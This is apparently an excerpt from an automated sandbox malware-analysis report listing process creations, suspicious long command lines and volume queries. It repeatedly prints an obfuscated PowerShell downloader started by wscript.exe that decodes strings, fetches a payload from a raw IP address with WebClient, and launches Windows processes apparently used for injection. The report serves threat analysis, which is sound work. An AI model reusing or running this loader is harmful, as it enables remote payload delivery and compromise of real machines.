Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exe Process created: C:\Windows\SysWOW64\recover.exe "C:\Windows\SysWOW64\recover.exe" Jump to behavior
Source: C:\Windows\SysWOW64\recover.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$caked124 = 1;$allegroernes15='s';$allegroernes15+='ubstrin';$allegroernes15+='g';function unkaiserlike($micrometeoroid){$specialuddannelser=$micrometeoroid.length-$caked124;for($presaged=1; $presaged -lt $specialuddannelser; $presaged+=(2)){$vedic+=$micrometeoroid.$allegroernes15.invoke($presaged, $caked124);}$vedic;}function hydrolyzable($superheater){. ($porsitets) ($superheater);}$alcoholmeter=unkaiserlike ',m olzgifldl,a,/ 5 . 0v f(,w,iknud o.wkss fnstb ,1.0,.t0,;s qwfisna6c4 ;c fx 6h4v; sr.v :.1 2 1k.b0a), bgpe,crk.ot/ 2h0 1,0 0n1 0a1d uf i r,eufvo.x./h1 2,1s.a0, ';$nonattribution175=unkaiserlike '.u sme r -pa gde.ndtb ';$leggiest89=unkaiserlike 'hh t t p :t/,/.8s7c.c1s2,1,. 1k0s5t.,1 6p3 / d,o m ksappkibt,l e rb.fmis ia ';$heitiki=unkaiserlike 't>s ';$porsitets=unkaiserlike ' iuelx ';$mediaevalism='garapato';hydrolyzable (unkaiserlike 'rsce,ts- cyocnet.e,n.t, c- p aat.hs tp:j\ juo.rbdmk l o,dae,r . t.xntc a-,v,all.u.ee .$,m e.daita ebvsajl.ihsnmu; ');hydrolyzable (unkaiserlike ' i f ( t e sft -ap,a.t h, rtg:e\ j onr d,k lbofdfedro.,tpx.tl)f{ egxsi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cdh.o. n%,a p.p,d aotfa.% \ t hlewrsmmorsgwdist c.hm1b7 2i. mie d, t&p&e be.cuhfof ,$. ';hydrolyzable (unkaiserlike '.$.gqlcopbpaclb:,all gru mm=a( chm dh / c $ml,aanrdpian g s.p.r.otc,eodmuar,ekr n,ets ) ');hydrolyzable (unkaiserlike ' $ g lso b a lu:ld.a t,atmaagssk i n e rinne,=n$ lseag,g i e,sdtf8o9e. s,pdlsi t (.$,h e ictai ksi,). ');$leggiest89=$datamaskinerne[0];hydrolyzable (unkaiserlike ' $gg l o b a,lk:.rji p phlaesrms.=cn e,w,-,orb.j e cftb sdyasmtpe ms.sn e tk.bwne,bgc lsi eknbtf ');hydrolyzable (unkaiserlike 'u$ir ijp p l e rcsl.rh.e,ard,e r sf[.$bnsovnmabt t,rii baudt ido nf1s7d5 ]p=s$eavl,c.o.hro lhmse,the r ');$entertaineres=unkaiserlike 'sr ihpapwl e,rvs . dsorwwn,l.osa,difsivl es(a$ l e g,gcibess tc8 9p,e$nl u,fkton irn,gdedr,s 1 8 5,)s ';$entertaineres=$algum[1]+$entertaineres;$luftningers185=$algum[0];hydrolyzable (unkaiserlike ',$ g,l.o,b,agl :,p rlo,p a gae r,e.nrd e =g(.tuecs tn-,p a,t h $ lpucfktdnsi,ngg efr sf1t8i5l) ');while (!$propagerende) {hydrolyzable (unkaiserlike ' $sgcl odbsafls:.v iud.e lcyhsrtbe nq=c$ft,r upei ') ;hydrolyzable $entertaineres;hydrolyzable (unkaiserlike ' s.t a r tu-,stl.ele.ph s4 ');hydrolyzable (unkaiserlike ',$ g leo b.a le:op,rnopp,asgte r.e n dee,= (pt,e srtf-.poa tphv b$fl u,fttbn i n,g egrusb1o8.5 )r ') ;hydrolyzable (unkaiserlike ' $mgal ovb aslk: d.e.cnatnsaulj=m$bgnl,oibeaal,:fa.lfgnosr.itstttikcc+ +r% $ dyast asmna.spk ivnne ronfe .,c,otu.n tp ') ;$leggiest89=$datamaskinerne[$decanal];}hydrolyzable (unkaiserlike ' $tg.lpo bsacls:stbr aun sfpsast ruocn.itzpe d, a=. ,gaekt - c,oan,t edn tp t$tlaunfttfn ian g ear s 1j8s5 ');hydrolyzable (unkaiserlike 'p$.galpotb aolb:fu n.laa i,df =s m[.s,ylsbt.eam ..cuo n vre.r.t.],: : f rbo m bga sce,6c4,sst r.itntgp(d
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$caked124 = 1;$allegroernes15='s';$allegroernes15+='ubstrin';$allegroernes15+='g';function unkaiserlike($micrometeoroid){$specialuddannelser=$micrometeoroid.length-$caked124;for($presaged=1; $presaged -lt $specialuddannelser; $presaged+=(2)){$vedic+=$micrometeoroid.$allegroernes15.invoke($presaged, $caked124);}$vedic;}function hydrolyzable($superheater){. ($porsitets) ($superheater);}$alcoholmeter=unkaiserlike ',m olzgifldl,a,/ 5 . 0v f(,w,iknud o.wkss fnstb ,1.0,.t0,;s qwfisna6c4 ;c fx 6h4v; sr.v :.1 2 1k.b0a), bgpe,crk.ot/ 2h0 1,0 0n1 0a1d uf i r,eufvo.x./h1 2,1s.a0, ';$nonattribution175=unkaiserlike '.u sme r -pa gde.ndtb ';$leggiest89=unkaiserlike 'hh t t p :t/,/.8s7c.c1s2,1,. 1k0s5t.,1 6p3 / d,o m ksappkibt,l e rb.fmis ia ';$heitiki=unkaiserlike 't>s ';$porsitets=unkaiserlike ' iuelx ';$mediaevalism='garapato';hydrolyzable (unkaiserlike 'rsce,ts- cyocnet.e,n.t, c- p aat.hs tp:j\ juo.rbdmk l o,dae,r . t.xntc a-,v,all.u.ee .$,m e.daita ebvsajl.ihsnmu; ');hydrolyzable (unkaiserlike ' i f ( t e sft -ap,a.t h, rtg:e\ j onr d,k lbofdfedro.,tpx.tl)f{ egxsi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cdh.o. n%,a p.p,d aotfa.% \ t hlewrsmmorsgwdist c.hm1b7 2i. mie d, t&p&e be.cuhfof ,$. ';hydrolyzable (unkaiserlike '.$.gqlcopbpaclb:,all gru mm=a( chm dh / c $ml,aanrdpian g s.p.r.otc,eodmuar,ekr n,ets ) ');hydrolyzable (unkaiserlike ' $ g lso b a lu:ld.a t,atmaagssk i n e rinne,=n$ lseag,g i e,sdtf8o9e. s,pdlsi t (.$,h e ictai ksi,). ');$leggiest89=$datamaskinerne[0];hydrolyzable (unkaiserlike ' $gg l o b a,lk:.rji p phlaesrms.=cn e,w,-,orb.j e cftb sdyasmtpe ms.sn e tk.bwne,bgc lsi eknbtf ');hydrolyzable (unkaiserlike 'u$ir ijp p l e rcsl.rh.e,ard,e r sf[.$bnsovnmabt t,rii baudt ido nf1s7d5 ]p=s$eavl,c.o.hro lhmse,the r ');$entertaineres=unkaiserlike 'sr ihpapwl e,rvs . dsorwwn,l.osa,difsivl es(a$ l e g,gcibess tc8 9p,e$nl u,fkton irn,gdedr,s 1 8 5,)s ';$entertaineres=$algum[1]+$entertaineres;$luftningers185=$algum[0];hydrolyzable (unkaiserlike ',$ g,l.o,b,agl :,p rlo,p a gae r,e.nrd e =g(.tuecs tn-,p a,t h $ lpucfktdnsi,ngg efr sf1t8i5l) ');while (!$propagerende) {hydrolyzable (unkaiserlike ' $sgcl odbsafls:.v iud.e lcyhsrtbe nq=c$ft,r upei ') ;hydrolyzable $entertaineres;hydrolyzable (unkaiserlike ' s.t a r tu-,stl.ele.ph s4 ');hydrolyzable (unkaiserlike ',$ g leo b.a le:op,rnopp,asgte r.e n dee,= (pt,e srtf-.poa tphv b$fl u,fttbn i n,g egrusb1o8.5 )r ') ;hydrolyzable (unkaiserlike ' $mgal ovb aslk: d.e.cnatnsaulj=m$bgnl,oibeaal,:fa.lfgnosr.itstttikcc+ +r% $ dyast asmna.spk ivnne ronfe .,c,otu.n tp ') ;$leggiest89=$datamaskinerne[$decanal];}hydrolyzable (unkaiserlike ' $tg.lpo bsacls:stbr aun sfpsast ruocn.itzpe d, a=. ,gaekt - c,oan,t edn tp t$tlaunfttfn ian g ear s 1j8s5 ');hydrolyzable (unkaiserlike 'p$.galpotb aolb:fu n.laa i,df =s m[.s,ylsbt.eam ..cuo n vre.r.t.],: : f rbo m bga sce,6c4,sst r.itntgp(d
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "$caked124 = 1;$allegroernes15='s';$allegroernes15+='ubstrin';$allegroernes15+='g';function unkaiserlike($micrometeoroid){$specialuddannelser=$micrometeoroid.length-$caked124;for($presaged=1; $presaged -lt $specialuddannelser; $presaged+=(2)){$vedic+=$micrometeoroid.$allegroernes15.invoke($presaged, $caked124);}$vedic;}function hydrolyzable($superheater){. ($porsitets) ($superheater);}$alcoholmeter=unkaiserlike ',m olzgifldl,a,/ 5 . 0v f(,w,iknud o.wkss fnstb ,1.0,.t0,;s qwfisna6c4 ;c fx 6h4v; sr.v :.1 2 1k.b0a), bgpe,crk.ot/ 2h0 1,0 0n1 0a1d uf i r,eufvo.x./h1 2,1s.a0, ';$nonattribution175=unkaiserlike '.u sme r -pa gde.ndtb ';$leggiest89=unkaiserlike 'hh t t p :t/,/.8s7c.c1s2,1,. 1k0s5t.,1 6p3 / d,o m ksappkibt,l e rb.fmis ia ';$heitiki=unkaiserlike 't>s ';$porsitets=unkaiserlike ' iuelx ';$mediaevalism='garapato';hydrolyzable (unkaiserlike 'rsce,ts- cyocnet.e,n.t, c- p aat.hs tp:j\ juo.rbdmk l o,dae,r . t.xntc a-,v,all.u.ee .$,m e.daita ebvsajl.ihsnmu; ');hydrolyzable (unkaiserlike ' i f ( t e sft -ap,a.t h, rtg:e\ j onr d,k lbofdfedro.,tpx.tl)f{ egxsi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cdh.o. n%,a p.p,d aotfa.% \ t hlewrsmmorsgwdist c.hm1b7 2i. mie d, t&p&e be.cuhfof ,$. ';hydrolyzable (unkaiserlike '.$.gqlcopbpaclb:,all gru mm=a( chm dh / c $ml,aanrdpian g s.p.r.otc,eodmuar,ekr n,ets ) ');hydrolyzable (unkaiserlike ' $ g lso b a lu:ld.a t,atmaagssk i n e rinne,=n$ lseag,g i e,sdtf8o9e. s,pdlsi t (.$,h e ictai ksi,). ');$leggiest89=$datamaskinerne[0];hydrolyzable (unkaiserlike ' $gg l o b a,lk:.rji p phlaesrms.=cn e,w,-,orb.j e cftb sdyasmtpe ms.sn e tk.bwne,bgc lsi eknbtf ');hydrolyzable (unkaiserlike 'u$ir ijp p l e rcsl.rh.e,ard,e r sf[.$bnsovnmabt t,rii baudt ido nf1s7d5 ]p=s$eavl,c.o.hro lhmse,the r ');$entertaineres=unkaiserlike 'sr ihpapwl e,rvs . dsorwwn,l.osa,difsivl es(a$ l e g,gcibess tc8 9p,e$nl u,fkton irn,gdedr,s 1 8 5,)s ';$entertaineres=$algum[1]+$entertaineres;$luftningers185=$algum[0];hydrolyzable (unkaiserlike ',$ g,l.o,b,agl :,p rlo,p a gae r,e.nrd e =g(.tuecs tn-,p a,t h $ lpucfktdnsi,ngg efr sf1t8i5l) ');while (!$propagerende) {hydrolyzable (unkaiserlike ' $sgcl odbsafls:.v iud.e lcyhsrtbe nq=c$ft,r upei ') ;hydrolyzable $entertaineres;hydrolyzable (unkaiserlike ' s.t a r tu-,stl.ele.ph s4 ');hydrolyzable (unkaiserlike ',$ g leo b.a le:op,rnopp,asgte r.e n dee,= (pt,e srtf-.poa tphv b$fl u,fttbn i n,g egrusb1o8.5 )r ') ;hydrolyzable (unkaiserlike ' $mgal ovb aslk: d.e.cnatnsaulj=m$bgnl,oibeaal,:fa.lfgnosr.itstttikcc+ +r% $ dyast asmna.spk ivnne ronfe .,c,otu.n tp ') ;$leggiest89=$datamaskinerne[$decanal];}hydrolyzable (unkaiserlike ' $tg.lpo bsacls:stbr aun sfpsast ruocn.itzpe d, a=. ,gaekt - c,oan,t edn tp t$tlaunfttfn ian g ear s 1j8s5 ');hydrolyzable (unkaiserlike 'p$.galpotb aolb:fu n.laa i,df =s m[.s,ylsbt.eam ..cuo n vre.r.t.],: : f rbo m bga sce,6c4,sst r.itntgp(d Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$caked124 = 1;$allegroernes15='s';$allegroernes15+='ubstrin';$allegroernes15+='g';function unkaiserlike($micrometeoroid){$specialuddannelser=$micrometeoroid.length-$caked124;for($presaged=1; $presaged -lt $specialuddannelser; $presaged+=(2)){$vedic+=$micrometeoroid.$allegroernes15.invoke($presaged, $caked124);}$vedic;}function hydrolyzable($superheater){. ($porsitets) ($superheater);}$alcoholmeter=unkaiserlike ',m olzgifldl,a,/ 5 . 0v f(,w,iknud o.wkss fnstb ,1.0,.t0,;s qwfisna6c4 ;c fx 6h4v; sr.v :.1 2 1k.b0a), bgpe,crk.ot/ 2h0 1,0 0n1 0a1d uf i r,eufvo.x./h1 2,1s.a0, ';$nonattribution175=unkaiserlike '.u sme r -pa gde.ndtb ';$leggiest89=unkaiserlike 'hh t t p :t/,/.8s7c.c1s2,1,. 1k0s5t.,1 6p3 / d,o m ksappkibt,l e rb.fmis ia ';$heitiki=unkaiserlike 't>s ';$porsitets=unkaiserlike ' iuelx ';$mediaevalism='garapato';hydrolyzable (unkaiserlike 'rsce,ts- cyocnet.e,n.t, c- p aat.hs tp:j\ juo.rbdmk l o,dae,r . t.xntc a-,v,all.u.ee .$,m e.daita ebvsajl.ihsnmu; ');hydrolyzable (unkaiserlike ' i f ( t e sft -ap,a.t h, rtg:e\ j onr d,k lbofdfedro.,tpx.tl)f{ egxsi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cdh.o. n%,a p.p,d aotfa.% \ t hlewrsmmorsgwdist c.hm1b7 2i. mie d, t&p&e be.cuhfof ,$. ';hydrolyzable (unkaiserlike '.$.gqlcopbpaclb:,all gru mm=a( chm dh / c $ml,aanrdpian g s.p.r.otc,eodmuar,ekr n,ets ) ');hydrolyzable (unkaiserlike ' $ g lso b a lu:ld.a t,atmaagssk i n e rinne,=n$ lseag,g i e,sdtf8o9e. s,pdlsi t (.$,h e ictai ksi,). ');$leggiest89=$datamaskinerne[0];hydrolyzable (unkaiserlike ' $gg l o b a,lk:.rji p phlaesrms.=cn e,w,-,orb.j e cftb sdyasmtpe ms.sn e tk.bwne,bgc lsi eknbtf ');hydrolyzable (unkaiserlike 'u$ir ijp p l e rcsl.rh.e,ard,e r sf[.$bnsovnmabt t,rii baudt ido nf1s7d5 ]p=s$eavl,c.o.hro lhmse,the r ');$entertaineres=unkaiserlike 'sr ihpapwl e,rvs . dsorwwn,l.osa,difsivl es(a$ l e g,gcibess tc8 9p,e$nl u,fkton irn,gdedr,s 1 8 5,)s ';$entertaineres=$algum[1]+$entertaineres;$luftningers185=$algum[0];hydrolyzable (unkaiserlike ',$ g,l.o,b,agl :,p rlo,p a gae r,e.nrd e =g(.tuecs tn-,p a,t h $ lpucfktdnsi,ngg efr sf1t8i5l) ');while (!$propagerende) {hydrolyzable (unkaiserlike ' $sgcl odbsafls:.v iud.e lcyhsrtbe nq=c$ft,r upei ') ;hydrolyzable $entertaineres;hydrolyzable (unkaiserlike ' s.t a r tu-,stl.ele.ph s4 ');hydrolyzable (unkaiserlike ',$ g leo b.a le:op,rnopp,asgte r.e n dee,= (pt,e srtf-.poa tphv b$fl u,fttbn i n,g egrusb1o8.5 )r ') ;hydrolyzable (unkaiserlike ' $mgal ovb aslk: d.e.cnatnsaulj=m$bgnl,oibeaal,:fa.lfgnosr.itstttikcc+ +r% $ dyast asmna.spk ivnne ronfe .,c,otu.n tp ') ;$leggiest89=$datamaskinerne[$decanal];}hydrolyzable (unkaiserlike ' $tg.lpo bsacls:stbr aun sfpsast ruocn.itzpe d, a=. ,gaekt - c,oan,t edn tp t$tlaunfttfn ian g ear s 1j8s5 ');hydrolyzable (unkaiserlike 'p$.galpotb aolb:fu n.laa i,df =s m[.s,ylsbt.eam ..cuo n vre.r.t.],: : f rbo m bga sce,6c4,sst r.itntgp(d Jump to behavior
Source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000000.2509121422.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358486473.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2711954327.00000000016B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000000.2509121422.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358486473.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2711954327.00000000016B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000000.2509121422.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358486473.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2711954327.00000000016B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: qdSMStVpAfAXHdDEbm.exe, 0000000C.00000000.2509121422.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000C.00000002.3358486473.0000000001061000.00000002.00000001.00040000.00000000.sdmp, qdSMStVpAfAXHdDEbm.exe, 0000000E.00000000.2711954327.00000000016B0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
